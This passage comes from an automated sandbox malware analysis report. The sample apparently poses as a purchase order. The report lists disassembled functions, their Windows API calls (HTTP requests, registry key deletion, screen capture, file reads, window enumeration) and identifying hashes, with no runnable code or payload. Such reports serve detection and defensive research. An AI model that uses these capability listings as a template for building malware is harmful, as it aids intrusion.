                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F99225
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00F9923E
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00F99255
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00F99277
                          • DragFinish.SHELL32(?), ref: 00F9927E
                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00F99371
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                          • API String ID: 221274066-3440237614
                          • Opcode ID: 0623cbe15433cb21db0582b443a781fd9abb18c41094bf0c6940749f09911a08
                          • Instruction ID: a0435964fabc499e93f236e16b2809a16612ca63da7ce2bc42e41abb75dae5bc
                          • Opcode Fuzzy Hash: 0623cbe15433cb21db0582b443a781fd9abb18c41094bf0c6940749f09911a08
                          • Instruction Fuzzy Hash: 40618A72508305AFD701EF64DC85DAFBBE8EF89350F40091EF595931A1DB709A48EBA2
                          Function 00F7C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F7C4B0
                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00F7C4C3
                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00F7C4D7
                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F7C4F0
                          • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00F7C533
                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F7C549
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F7C554
                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F7C584
                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00F7C5DC
                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00F7C5F0
                          • InternetCloseHandle.WININET(00000000), ref: 00F7C5FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                          • String ID:
                          • API String ID: 3800310941-3916222277
                          • Opcode ID: 2a63a0b5e89c2463e2e93474f32abd852169a9829fa49483f4c8efcdb7d43dc2
                          • Instruction ID: 5df674ff1d5a522357fbbea3dd0857717d6d571bb299c8e7efcd59745b9caa03
                          • Opcode Fuzzy Hash: 2a63a0b5e89c2463e2e93474f32abd852169a9829fa49483f4c8efcdb7d43dc2
                          • Instruction Fuzzy Hash: 40514FB1500609BFDB218FA0CD88AAB7BBCFF04754F04841FF94996150DB35E944ABE2
                          Function 00F9856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00F98592
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00F985A2
                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00F985AD
                          • CloseHandle.KERNEL32(00000000), ref: 00F985BA
                          • GlobalLock.KERNEL32(00000000), ref: 00F985C8
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00F985D7
                          • GlobalUnlock.KERNEL32(00000000), ref: 00F985E0
                          • CloseHandle.KERNEL32(00000000), ref: 00F985E7
                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00F985F8
                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00F9FC38,?), ref: 00F98611
                          • GlobalFree.KERNEL32(00000000), ref: 00F98621
                          • GetObjectW.GDI32(?,00000018,000000FF), ref: 00F98641
                          • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00F98671
                          • DeleteObject.GDI32(00000000), ref: 00F98699
                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F986AF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                          • String ID:
                          • API String ID: 3840717409-0
                          • Opcode ID: dca884fdd964d64e786f325046817a4c0bb8a5909c0e045112267dabb147ebb7
                          • Instruction ID: 56c363da81f8a8c8339b156bd99a45b7eb5bc95924f0d72d31bfa185a106d278
                          • Opcode Fuzzy Hash: dca884fdd964d64e786f325046817a4c0bb8a5909c0e045112267dabb147ebb7
                          • Instruction Fuzzy Hash: CF412E75A00208AFDB11DF65DD48EAE7BB8FF89761F144059F905EB260DB309D41EB60
                          Function 00F714BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(00000000), ref: 00F71502
                          • VariantCopy.OLEAUT32(?,?), ref: 00F7150B
                          • VariantClear.OLEAUT32(?), ref: 00F71517
                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00F715FB
                          • VarR8FromDec.OLEAUT32(?,?), ref: 00F71657
                          • VariantInit.OLEAUT32(?), ref: 00F71708
                          • SysFreeString.OLEAUT32(?), ref: 00F7178C
                          • VariantClear.OLEAUT32(?), ref: 00F717D8
                          • VariantClear.OLEAUT32(?), ref: 00F717E7
                          • VariantInit.OLEAUT32(00000000), ref: 00F71823
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                          • API String ID: 1234038744-3931177956
                          • Opcode ID: f6c311cdaf273ea9cf3ea862e50c83eb554a4a10c91df4d0c53f0334d555cb5b
                          • Instruction ID: 88ac209dac9795d78522cae285d6eb4ecbc6044a77ae65f374d63e7213b4f59f
                          • Opcode Fuzzy Hash: f6c311cdaf273ea9cf3ea862e50c83eb554a4a10c91df4d0c53f0334d555cb5b
                          • Instruction Fuzzy Hash: 3BD1D172A00115EBDF189F69D885BB9B7B5BF44704F18C05BE40AAB181DB34DC49FBA2
                          Function 00F8B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                            • Part of subcall function 00F8C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F8B6AE,?,?), ref: 00F8C9B5
                            • Part of subcall function 00F8C998: _wcslen.LIBCMT ref: 00F8C9F1
                            • Part of subcall function 00F8C998: _wcslen.LIBCMT ref: 00F8CA68
                            • Part of subcall function 00F8C998: _wcslen.LIBCMT ref: 00F8CA9E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F8B6F4
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F8B772
                          • RegDeleteValueW.ADVAPI32(?,?), ref: 00F8B80A
                          • RegCloseKey.ADVAPI32(?), ref: 00F8B87E
                          • RegCloseKey.ADVAPI32(?), ref: 00F8B89C
                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00F8B8F2
                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F8B904
                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F8B922
                          • FreeLibrary.KERNEL32(00000000), ref: 00F8B983
                          • RegCloseKey.ADVAPI32(00000000), ref: 00F8B994
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                          • String ID: RegDeleteKeyExW$advapi32.dll
                          • API String ID: 146587525-4033151799
                          • Opcode ID: 8dd46c7ca106dfe2e56cc985a810b543a23c749cd75cb4f53e8e90a03879c9c8
                          • Instruction ID: ecf5c0bb5ba7b7165a9448daaf14a96b7203ce33314c768aaeafecc9251d2211
                          • Opcode Fuzzy Hash: 8dd46c7ca106dfe2e56cc985a810b543a23c749cd75cb4f53e8e90a03879c9c8
                          • Instruction Fuzzy Hash: FBC18E31608201AFD710EF14C895F6ABBE5BF84318F14859CF59A8B3A2CB75EC45EB91
                          Function 00F8255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetDC.USER32(00000000), ref: 00F825D8
                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00F825E8
                          • CreateCompatibleDC.GDI32(?), ref: 00F825F4
                          • SelectObject.GDI32(00000000,?), ref: 00F82601
                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00F8266D
                          • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00F826AC
                          • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00F826D0
                          • SelectObject.GDI32(?,?), ref: 00F826D8
                          • DeleteObject.GDI32(?), ref: 00F826E1
                          • DeleteDC.GDI32(?), ref: 00F826E8
                          • ReleaseDC.USER32(00000000,?), ref: 00F826F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                          • String ID: (
                          • API String ID: 2598888154-3887548279
                          • Opcode ID: f5fe92e347b90c4c208c3e282d4daded2cad1717c127dd8dec439c443276333a
                          • Instruction ID: 6f08acf2325d8f56361faf9394f34e2fa46db2f21670482aaa123db0237e46a3
                          • Opcode Fuzzy Hash: f5fe92e347b90c4c208c3e282d4daded2cad1717c127dd8dec439c443276333a
                          • Instruction Fuzzy Hash: A661F175D00219EFCF04DFA8DC84AAEBBB5FF48310F20852AE955A7250E774A941DFA4
                          Function 00F3DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • ___free_lconv_mon.LIBCMT ref: 00F3DAA1
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D659
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D66B
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D67D
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D68F
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D6A1
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D6B3
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D6C5
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D6D7
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D6E9
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D6FB
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D70D
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D71F
                            • Part of subcall function 00F3D63C: _free.LIBCMT ref: 00F3D731
                          • _free.LIBCMT ref: 00F3DA96
                            • Part of subcall function 00F329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3D7D1,00000000,00000000,00000000,00000000,?,00F3D7F8,00000000,00000007,00000000,?,00F3DBF5,00000000), ref: 00F329DE
                            • Part of subcall function 00F329C8: GetLastError.KERNEL32(00000000,?,00F3D7D1,00000000,00000000,00000000,00000000,?,00F3D7F8,00000000,00000007,00000000,?,00F3DBF5,00000000,00000000), ref: 00F329F0
                          • _free.LIBCMT ref: 00F3DAB8
                          • _free.LIBCMT ref: 00F3DACD
                          • _free.LIBCMT ref: 00F3DAD8
                          • _free.LIBCMT ref: 00F3DAFA
                          • _free.LIBCMT ref: 00F3DB0D
                          • _free.LIBCMT ref: 00F3DB1B
                          • _free.LIBCMT ref: 00F3DB26
                          • _free.LIBCMT ref: 00F3DB5E
                          • _free.LIBCMT ref: 00F3DB65
                          • _free.LIBCMT ref: 00F3DB82
                          • _free.LIBCMT ref: 00F3DB9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                          • String ID:
                          • API String ID: 161543041-0
                          • Opcode ID: 263ba48cdf176f8cf959f999b358733953a67b3aaef1c8f15473f2018245e0e8
                          • Instruction ID: 4366a4a97d937bd555f7adfea2a032d24102cbf50a00e1159ab38ab1ae955585
                          • Opcode Fuzzy Hash: 263ba48cdf176f8cf959f999b358733953a67b3aaef1c8f15473f2018245e0e8
                          • Instruction Fuzzy Hash: 01314732A042059FEB62AA39FD45B5AB7E9FF40330F154469E459D7192DB39AC80BB20
                          Function 00F6365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetClassNameW.USER32(?,?,00000100), ref: 00F6369C
                          • _wcslen.LIBCMT ref: 00F636A7
                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00F63797
                          • GetClassNameW.USER32(?,?,00000400), ref: 00F6380C
                          • GetDlgCtrlID.USER32(?), ref: 00F6385D
                          • GetWindowRect.USER32(?,?), ref: 00F63882
                          • GetParent.USER32(?), ref: 00F638A0
                          • ScreenToClient.USER32(00000000), ref: 00F638A7
                          • GetClassNameW.USER32(?,?,00000100), ref: 00F63921
                          • GetWindowTextW.USER32(?,?,00000400), ref: 00F6395D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                          • String ID: %s%u
                          • API String ID: 4010501982-679674701
                          • Opcode ID: ba4b5082c0466aa84a895b8104b80731a13d82f076fbb9e2a0fe5a84e1873cb9
                          • Instruction ID: 2b3dc497a1fa4df0438ecf595efa2cd1ff21b0127f5c5a3fe94f0f2b05063791
                          • Opcode Fuzzy Hash: ba4b5082c0466aa84a895b8104b80731a13d82f076fbb9e2a0fe5a84e1873cb9
                          • Instruction Fuzzy Hash: 9091C071604706AFD719DF24C885FEAF7A9FF44360F008629F99AC2190DB34EA45EB91
                          Function 00F64954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                          Download Yara Rule
                          APIs
                          • GetClassNameW.USER32(?,?,00000400), ref: 00F64994
                          • GetWindowTextW.USER32(?,?,00000400), ref: 00F649DA
                          • _wcslen.LIBCMT ref: 00F649EB
                          • CharUpperBuffW.USER32(?,00000000), ref: 00F649F7
                          • _wcsstr.LIBVCRUNTIME ref: 00F64A2C
                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00F64A64
                          • GetWindowTextW.USER32(?,?,00000400), ref: 00F64A9D
                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00F64AE6
                          • GetClassNameW.USER32(?,?,00000400), ref: 00F64B20
                          • GetWindowRect.USER32(?,?), ref: 00F64B8B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                          • String ID: ThumbnailClass
                          • API String ID: 1311036022-1241985126
                          • Opcode ID: 66a972f58502326c14f28cce4f8bd38c2b53ca3a08d187dcb79c3e59d46539aa
                          • Instruction ID: 95bdd9ee70028daa006f08979493f2ceb08e4b794d6b3dd29bd12843b52506d3
                          • Opcode Fuzzy Hash: 66a972f58502326c14f28cce4f8bd38c2b53ca3a08d187dcb79c3e59d46539aa
                          • Instruction Fuzzy Hash: 6A91C231408205AFDB08EF14C981FAA77E8FF84724F04846AFD859A196DB34FD45EBA1
                          Function 00F8CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00F8CC64
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00F8CC8D
                          • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00F8CD48
                            • Part of subcall function 00F8CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00F8CCAA
                            • Part of subcall function 00F8CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00F8CCBD
                            • Part of subcall function 00F8CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F8CCCF
                            • Part of subcall function 00F8CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00F8CD05
                            • Part of subcall function 00F8CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00F8CD28
                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F8CCF3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                          • String ID: RegDeleteKeyExW$advapi32.dll
                          • API String ID: 2734957052-4033151799
                          • Opcode ID: 58e0c4da9f526fff8ef2740327cbd16c9caf0cb6467f9568ad29016f04379864
                          • Instruction ID: b0ff3c2ad6091d818d303f64bd0e55ca3e174e549b747579bb452374e33ff782
                          • Opcode Fuzzy Hash: 58e0c4da9f526fff8ef2740327cbd16c9caf0cb6467f9568ad29016f04379864
                          • Instruction Fuzzy Hash: E1314B72D0112DBBDB20AB65DC88EEFBB7CEF46750F000166A915E3250DA749A45ABF0
                          Function 00F73D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F73D40
                          • _wcslen.LIBCMT ref: 00F73D6D
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F73D9D
                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F73DBE
                          • RemoveDirectoryW.KERNEL32(?), ref: 00F73DCE
                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F73E55
                          • CloseHandle.KERNEL32(00000000), ref: 00F73E60
                          • CloseHandle.KERNEL32(00000000), ref: 00F73E6B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                          • String ID: :$\$\??\%s
                          • API String ID: 1149970189-3457252023
                          • Opcode ID: f12e046060668cea4a2fe983d7356b4e3278bfc1001b442c128b768ec08a9237
                          • Instruction ID: 466062d4e0c28a92f3c4af87e188431999d9af8678876480c71492b481005c39
                          • Opcode Fuzzy Hash: f12e046060668cea4a2fe983d7356b4e3278bfc1001b442c128b768ec08a9237
                          • Instruction Fuzzy Hash: B031A172900219BBDB209BA0DC49FEB37BCEF88710F1081B7F509D6060E7749784AB65
                          Function 00F6E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • timeGetTime.WINMM ref: 00F6E6B4
                            • Part of subcall function 00F1E551: timeGetTime.WINMM(?,?,00F6E6D4), ref: 00F1E555
                          • Sleep.KERNEL32(0000000A), ref: 00F6E6E1
                          • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00F6E705
                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F6E727
                          • SetActiveWindow.USER32 ref: 00F6E746
                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F6E754
                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F6E773
                          • Sleep.KERNEL32(000000FA), ref: 00F6E77E
                          • IsWindow.USER32 ref: 00F6E78A
                          • EndDialog.USER32(00000000), ref: 00F6E79B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                          • String ID: BUTTON
                          • API String ID: 1194449130-3405671355
                          • Opcode ID: fbd7f1ba4dc2a3b53b06482a77726c71e8888c7ba0e0597f8461e0ceffa46e64
                          • Instruction ID: 1be4ccc6f46278b2840b3c064c3c6e5dfa0e81a94d62b10c5a251f3d61d1963e
                          • Opcode Fuzzy Hash: fbd7f1ba4dc2a3b53b06482a77726c71e8888c7ba0e0597f8461e0ceffa46e64
                          • Instruction Fuzzy Hash: 2C21AEBB20030CAFEB015F74EC89A263B6AFB64758B100426F515821A1DB76EC00BBA5
